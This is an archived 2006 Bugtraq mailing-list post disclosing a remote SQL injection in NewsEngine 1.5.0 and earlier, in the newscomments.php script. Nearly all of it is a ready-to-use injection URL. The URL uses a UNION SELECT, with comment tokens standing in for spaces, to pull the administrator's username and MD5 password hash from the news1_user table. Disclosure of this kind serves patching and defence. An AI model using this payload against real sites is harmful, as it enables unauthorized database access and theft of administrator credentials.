[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
- From: ajannhwt@xxxxxxxxxxx
- Date: 5 Jun 2006 07:42:55 -0000
# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection
Vulnerability
# Author : ajann
### Vulnerability;
$$$ http://[target]/[path]/newscomments.php
Example:
$$
http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*
Admin MD5 HaSh